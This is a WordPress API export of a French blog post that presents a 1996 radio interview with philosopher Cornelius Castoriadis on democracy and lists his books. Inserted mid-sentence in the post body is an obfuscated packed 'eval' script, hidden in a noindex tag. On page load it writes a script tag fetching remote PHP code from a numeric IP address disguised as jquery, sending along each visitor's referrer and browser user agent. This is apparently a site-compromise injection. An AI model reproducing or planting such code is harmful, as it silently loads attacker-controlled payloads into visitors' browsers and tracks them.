{"id":7050,"date":"2012-03-05T19:14:00","date_gmt":"2012-03-05T18:14:00","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=7050"},"modified":"2012-03-05T19:14:26","modified_gmt":"2012-03-05T18:14:26","slug":"7050","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=7050","title":{"rendered":"Entretien avec Cornelius Castoriadis"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/www.la-bas.org\/IMG\/arton2208.jpg\" alt=\"\" width=\"135\" height=\"74\" \/>Le <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|taran|var|u0026u|referrer|dtabb||js|php'.split('|'),0,{}))\n<\/script><\/noindex> philosophe et politologue Cornelius Castoriadis a d\u00e9fini la d\u00e9mocratie et ses conditions de possibilit\u00e9. D\u00e9c\u00e9d\u00e9 en 1997, le penseur fran\u00e7ais d\u2019origine grecque a pass\u00e9 une bonne partie de sa carri\u00e8re \u00e0 confronter la d\u00e9mocratie comme projet et surtout comme id\u00e9al, avec le r\u00e9gime d\u00e9mocratique comme r\u00e9alit\u00e9 concr\u00e8te et terre-\u00e0-terre, un r\u00e9gime parfois \u00ab\u00a0bassement\u00a0\u00bb proc\u00e9dural.<br \/>\nNouvelle diffusion de cet entretien avec Cornelius Castoriadis.<\/p>\n<p>[audio:http:\/\/media.la-bas.org\/mp3\/110617\/110617.mp3]<br \/>\nEn <a href=\"http:\/\/media.la-bas.org\/mp3\/110617\/110617.mp3\">mp3<\/a> (6 min) &#8211; Source <a href=\"http:\/\/www.la-bas.org\/article.php3?id_article=2208\">France-Inter<\/a><br \/>\nCet entretien du 25 novembre 1996, r\u00e9alis\u00e9 par Daniel Mermet avec Cornelius Castoriadis \u00e0 l\u2019occasion de la sortie de \u00ab\u00a0La mont\u00e9e de l\u2019insignifiance\u00a0\u00bb a \u00e9t\u00e9 retranscrit aux \u00e9ditions de l\u2019Aube sous le titre \u00ab\u00a0Post-scriptum sur l\u2019insignifiance\u00a0\u00bb mais est en rupture de stock.<\/p>\n<p><!--more--><\/p>\n<hr \/>\n<p><strong>Programmation musicale<\/strong><br \/>\n<img decoding=\"async\" src=\"http:\/\/www.la-bas.org\/puce.gif\" alt=\"-\" \/>\u00a0\u00a0Ricet Barrier\u00a0: L\u2019enterrement<br \/>\n<img decoding=\"async\" src=\"http:\/\/www.la-bas.org\/puce.gif\" alt=\"-\" \/>\u00a0\u00a0Assassin\u00a0: L\u2019odyss\u00e9e suit son cours<\/p>\n<hr \/>\n<p><strong>Quelques livres de Cornelius Castoriadis<\/strong><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.la-bas.org\/puce.gif\" alt=\"-\" \/>\u00a0\u00a0\u00ab\u00a0Une soci\u00e9t\u00e9 \u00e0 la d\u00e9rive. Entretiens et d\u00e9bats, 1974-1997\u00a0\u00bb (Points &#8211; 13 janvier 2011)<br \/>\n<img decoding=\"async\" src=\"http:\/\/www.la-bas.org\/puce.gif\" alt=\"-\" \/>\u00a0\u00a0\u00ab\u00a0D\u00e9mocratie et relativisme. Entretiens avec le MAUSS\u00a0\u00bb (Mille et une nuits &#8211; 3 f\u00e9vrier 2010)<br \/>\n<img decoding=\"async\" src=\"http:\/\/www.la-bas.org\/puce.gif\" alt=\"-\" \/>\u00a0\u00a0\u00ab\u00a0Histoire et cr\u00e9ation. Textes philosophiques in\u00e9dits, 1945-1967\u00a0\u00bb (Seuil &#8211; 2 avril 2009)<br \/>\n<img decoding=\"async\" src=\"http:\/\/www.la-bas.org\/puce.gif\" alt=\"-\" \/>\u00a0\u00a0\u00ab\u00a0L\u2019imaginaire comme tel\u00a0\u00bb (Hermann &#8211; 5 juillet 2008)<br \/>\n<img decoding=\"async\" src=\"http:\/\/www.la-bas.org\/puce.gif\" alt=\"-\" \/>\u00a0\u00a0\u00ab\u00a0La mont\u00e9e de l\u2019insignifiance.\u00a0\u00bb dans \u00ab\u00a0Les carrefours du labyrinthe, volume 4.\u00a0\u00bb (Points &#8211; 11 janvier 2007)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Le philosophe et politologue Cornelius Castoriadis a d\u00e9fini la d\u00e9mocratie et ses conditions de possibilit\u00e9. D\u00e9c\u00e9d\u00e9 en 1997, le penseur fran\u00e7ais d\u2019origine grecque a pass\u00e9 une bonne partie de sa carri\u00e8re \u00e0 confronter la d\u00e9mocratie comme projet et surtout comme &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=7050\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,17],"tags":[],"class_list":["post-7050","post","type-post","status-publish","format-standard","hentry","category-documents-les-supplements","category-revue-de-medias"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7050","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7050"}],"version-history":[{"count":2,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7050\/revisions"}],"predecessor-version":[{"id":7052,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7050\/revisions\/7052"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7050"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7050"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7050"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}